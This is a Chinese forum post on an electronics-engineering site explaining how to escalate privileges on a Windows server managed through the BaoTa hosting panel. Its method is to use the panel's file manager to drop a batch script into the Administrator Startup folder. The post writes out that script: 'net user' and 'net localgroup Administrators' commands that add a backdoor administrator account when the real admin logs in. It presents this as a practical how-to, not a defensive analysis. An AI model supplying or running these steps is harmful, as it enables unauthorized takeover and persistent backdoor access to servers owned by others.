发帖

[经验]

香港云服务器宝塔windows面板提权获取系统管理员权限

2020-4-25 01:59:31

3665

0

在租用香港云服务器使用过宝塔管理面板的朋友都知道，宝塔面板的文件管理是可以访问各个硬盘目录有，并能修改删除上传，这对整个服务器安全来说是相当危险的。该方法的前提是你获取了宝塔的后台管理权限否则就不用往下看了，下面来说说宝塔windows面板提权过程。

测试系统：windows 2008

宝塔windows面板版本：3.1

提权方式：启动项

如果有了解过渗透方面的都应该知道，windows服务器启动项目录C:UsersAdministratorAppDataRoamingMicrosoftWindowsStartMenuProgramsStartup能上传写入vbs bat脚本几乎都能拿到服务器的管理权限，我们通过宝塔文件管理把下面的提权代码保存成xxx.vbs xxx.bat脚本后上传到启动项目录C:UsersAdministratorAppDataRoamingMicrosoftWindowsStartMenuProgramsStartup后只要等待服务器管理员登录服务器即可完成提权作业。

BAT提权添加用户脚本代码：

net user wwwtiewwcom www.tieww.com /add

net localgroup Administrators wwwtiewwcom /add

最后声明本获取管理员方法并非宝塔面板设计缺陷漏洞bug,而是宝塔是为了面板的易用性。

您身边的香港云服务器专家企鹅 2718305317我是做服务器的有问题你找我。

只看该作者 淘帖0 举报

相关推荐

评论

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容图片侵权或者其他问题，请联系本站作侵删。侵权投诉

精选推荐

如何在ROS中调用.so文件

4024 浏览 0 评论
VS上位机开发串口应该注意什么，为何发送的数据单片机无回应

9083 浏览 1 评论
CAN原理和通信软件推荐

7272 浏览 1 评论
推荐一款设备或者上位机软件

6800 浏览 1 评论
【微信精选】为什么在C语言中，goto这么不受待见？

3080 浏览 2 评论

快速回复 返回顶部 返回列表

关注微信公众号

电子发烧友网

电子发烧友论坛

社区合作: 刘勇; 联系电话：15994832713; 邮箱地址：liuyong@huaqiu.com

社区管理: elecfans短短; 微信：elecfans_666; 邮箱：users@huaqiu.com

返回上位机软件（C/Python/Java等）

回复

关闭

站长推荐 /7

快速回复 返回顶部 返回列表

- 威廉希尔官方网站社区: HarmonyOS威廉希尔官方网站社区

RISC-V MCU威廉希尔官方网站社区

FPGA开发者威廉希尔官方网站社区

- OpenHarmony开源社区: OpenHarmony开源社区

- 嵌入式论坛: ARM威廉希尔官方网站论坛

STM32/STM8威廉希尔官方网站论坛

嵌入式威廉希尔官方网站论坛

单片机/MCU论坛

RISC-V威廉希尔官方网站论坛

瑞芯微Rockchip开发者社区

FPGA|CPLD|ASIC论坛

DSP论坛

- 电路图及DIY: 电路设计论坛

DIY及创意

电子元器件论坛

专家问答

- 电源威廉希尔官方网站论坛: 电源威廉希尔官方网站论坛

无线充电威廉希尔官方网站

- 综合威廉希尔官方网站与应用: 机器人论坛

USB论坛

电机控制

模拟威廉希尔官方网站

音视频威廉希尔官方网站

综合威廉希尔官方网站交流

上位机软件（C/Python/Java等）

- 无线通信论坛: WIFI威廉希尔官方网站

蓝牙威廉希尔官方网站

天线|RF射频|微波|雷达威廉希尔官方网站

- EDA设计论坛: PCB设计论坛

DigiPCBA论坛

Protel|AD|DXP论坛

PADS威廉希尔官方网站论坛

Allegro论坛

multisim论坛

proteus论坛|仿真论坛

KiCad EDA 中文论坛

DFM|可制造性设计论坛

- 测试测量论坛: LabVIEW论坛

Matlab论坛

测试测量威廉希尔官方网站

传感威廉希尔官方网站

- 招聘/交友/外包/交易/杂谈: 项目外包

供需及二手交易

工程师杂谈|交友

招聘|求职|工程师职场

- 官方社区: 发烧友官方/活动

华秋商城

华秋电路

time

recommend

hot

post

—
—
—

版
块
导
航